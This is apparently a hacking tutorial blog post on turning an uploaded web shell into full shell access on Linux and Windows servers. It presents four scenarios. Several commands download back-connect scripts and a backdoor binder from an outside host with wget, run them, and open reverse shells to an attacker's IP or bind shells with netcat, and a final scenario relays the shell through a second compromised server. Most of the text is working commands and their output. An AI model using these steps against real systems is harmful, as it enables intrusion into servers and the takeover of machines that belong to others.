In many cases you saw someone gets a virtual shell from a webserver after uploading a ShellScript on
the webserver …
In this article i’m going to cover some methods used to get a virtual shell when you accomplished
uploading a simple ShellScript on the webserver
Scenario 1 :
Scenario : We have a linux server and our own box has a valid IP address (You can search Google.com for
more info about Valid/Invalid IP Addresses)Ok! we going to get reverse shell … By valid IP you can
bypass the firewall simply . Ok ! in this scenario we want to get a reverse shell, as we have a valid IP
Address we can simply bypass the firewall …
At first we need to open a port on out localmachine, the syntax is shown on the pictures :
for windows :
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
d:\Documents and Settings\Sc0rpion\Desktop>nc -lvp 2121
listening on [any] 2121 …
Note : The “-v” switch is for verbose mode, “-p” for the port number and “-l” puts the netcat in the
listening mode.
for linux :
$./nc -vlp 2121
Ok, now we need to upload a “back connect” script, we’ll use dc.pl for now, upload it as u’ve uploaded
the ShellScript or use “Wget”,”lwp-download” or “curl”, we’ll use wget for example :
cd /var/tmp;wget http://sc0rpion.by.ru/dc.pl
–06:33:16– http://sc0rpion.by.ru/dc.pl
=> `dc.pl’
Resolving sc0rpion.by.ru… 217.16.29.51
Connecting to sc0rpion.by.ru|217.16.29.51|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2.0 (2K) [text/plain]
0K ………. …….. 100% 70.86 KB/s
06:33:17 (70.86 KB/s) - `dc.pl’ saved [2/2]
Note : Using Curl depends on the IPTables policy on the machine (Linux) …
And we’ll run our perl script using this syntax :
$ perl dc.pl yourValidIP port
and id everythings going fine, we’ll get the shell in the netcat window we opened before.
Scenario 2 :
This Scenario is like the past one but in it we have a winNT server and your own box has validIP …
Right. in this article we try to get connect back in win servers. ( for bypassing the firewall )
At first we need to open a port on out localmachine, the syntax is shown on there:
MicrosoftWindows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>nc -vlp 2121
listening on [any] 2121 ...
Ok! Now you can use the script or program to get connect back . I use “TRKShell.exe” . upload
“TRKShell” with it necessary files on target :
7,680 TRK.exe
66 RSRC.RC
The program size is too low and you can transfer it Easily .
When you transfered those file exec it with this Command :
TRK -c 217.218.228.144 2121
At here 217.218.228.144 is my validIP and 2121 is port that was listened . If all thing be true , Now You
have Got The systemcontrol ! Like this :
connect to [*****] from localhost [*****] 2934
..:: Hax0rcitos Win32ASM Remote Shell v0.1 by Tarako@3wdesign.es ::..
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\.......................................... >
Scenario 3 :
Scenario 3 is different with 2 part ago . Our victim has linux/winNT server and our own box has InvalidIP
but server hasn’t a fire wall and you can open port with “binders” .
ForWinNT servers user Nc :
Nc –lp 6669 –dte cmd.exe
And then telnet it on port 6669 ….
For linux server :
There are many too “binders” and you can choose one of them ( it’s your work ! ) . I only say method !
Start !
At first you have to upload your own “binder” ,I user this one : “bindz” …. Follow the box !
cd /var/tmp;wget http://sc0rpion.by.ru/Toolz/bindz
--06:33:16-- http://sc0rpion.by.ru/Toolz/bindz
=> `bindz'
Resolving sc0rpion.by.ru... 217.16.29.51
Connecting to sc0rpion.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,429 (19K) [text/plain]
0K .......... ........ 100% 70.86 KB/s
06:33:17 (70.86 KB/s) - `bindz' saved [19429/19429]
So whenever somebody transferred some file on Linux server he/she must change it permission (
Google.com for more about permission ) , choose /var/tmp or /tmp cauz these are 777 alyaws .
See out put :
cd /var/tmp;la -la
drwxrwxrwt 4 root root 610304 Feb 18 06:40 .
drwxr-xr-x 27 root root 4096 Jan 29 04:07 ..
-rw-r--r-- 1 teambaby teambaby 19429 Jan 21 14:48 bindz
cd /tmp/var;chmod 777 bindz
< -------------------or------------------- >
cd /tmp/var;chmod +x bindz
cd /tmp/var;ls -la bindz
We did it what for ? cause we hadn’t perm to execute our file now we can exec it for bind a port on
remote machine …. Follow me :
-rwxrwxrwx 1 teambaby teambaby 19429 Jan 21 14:48 bindz
And :
cd /tmp/var;./bindz
See out put :
Innconect Boys backdoor =]
Binding the 9865
OK, pid 30062
Port was successfully binded on port “9865” and PID is 30062 ( at last you can remove it with “kill -9 30062” …
At last use Netcat :
$Nc www.site.com 9865
sh-2.05b$uname
linux
sh-2.05b$
Oh we got it ;)
For perl binders is similar the way that I was said in Scenario 3 but has a little change in it :
Bind your binder with perl Script ! Like this :
perl bindlin.pl
Just it , nothing else ! eNd Part 3.
Scenario 4 :
In this part your target has firewall and your own box has invalid IP so you cann’t use these methodz :
1 . Connect back ( server to your box )
2 . binding a port ( on server )
This method is most different than the other, Transfer shell between two remote machine !
So at first you need a server that has valid IP, we call it server “A”. And the server that you want to get
shell from it , we call server “B” .
At first you have to get remote shell from server “A” by binding port …
Then you must upload dc.pl ( or your CB script ) on server “B” . Upload “NC” into the server “A” and :
$ Chmod +x nc
$./nc –lvvp [port]
At server “B” we'll run our perl script using this syntax :
Bash# perl dc.pl [server”A”IP] [port]
and id every things going fine, we'll get the shell (Server “B”) in the Netcat window we opened before on
Server “A” . you see ! The shell was transferred easily between tow server ( Linux to Linux ) .
THE END.
You can download this journal in two language :
ليست هناك تعليقات:
إرسال تعليق